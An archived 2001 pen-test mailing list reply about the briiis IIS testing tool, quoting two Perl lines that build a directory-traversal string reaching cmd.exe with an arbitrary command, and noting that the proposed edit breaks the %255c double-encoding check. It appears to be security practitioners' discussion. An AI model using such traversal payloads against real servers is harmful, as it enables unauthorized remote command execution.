Re: iXsecurity.tool.briiis.3.02

From: Sigtrap (sigtrap@mail.bip.net)
Date: Wed Jun 13 2001 - 15:33:27 PDT

Next message: H D Moore: "Re: iXsecurity.tool.briiis.3.02"

Previous message: Sacha Faust: "new Ldap Security tool"
Maybe in reply to: ian.vitek@ixsecurity.com: "iXsecurity.tool.briiis.3.02"
Next in thread: Nicolas Gregoire: "Re: iXsecurity.tool.briiis.3.02"
Next in thread: Nicolas Gregoire: "Re: iXsecurity.tool.briiis.3.02"
Reply: Nicolas Gregoire: "Re: iXsecurity.tool.briiis.3.02"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Nicolas Gregoire writes:
> Here are the modifications I did to your toy :
> OLD LINE :
> $explstr="/..$opt_F..$opt_F..$opt_F..$opt_F..${opt_F}winnt/system32/cmd.exe?/c+$opt_c"
> if ($opt_c);
> NEW LINE :
> $explstr="/..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F../winnt/system32/cmd.exe?/c+$opt_c"
> if ($opt_c);

Have Nicolas tested his change before mailing pen-test?
If you change Ian Vitek's briiis with the NEW LINE, the double encoding vulnerability testing (%255c)
will fail due to the last '../'.

Briiis is not a toy, it is a weapon. Use it to defend yourself, not attacking. ;-)
//Sigtrap

Next message: H D Moore: "Re: iXsecurity.tool.briiis.3.02"
Previous message: Sacha Faust: "new Ldap Security tool"
Maybe in reply to: ian.vitek@ixsecurity.com: "iXsecurity.tool.briiis.3.02"
Next in thread: Nicolas Gregoire: "Re: iXsecurity.tool.briiis.3.02"
Next in thread: Nicolas Gregoire: "Re: iXsecurity.tool.briiis.3.02"
Reply: Nicolas Gregoire: "Re: iXsecurity.tool.briiis.3.02"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Jun 13 2001 - 22:35:59 PDT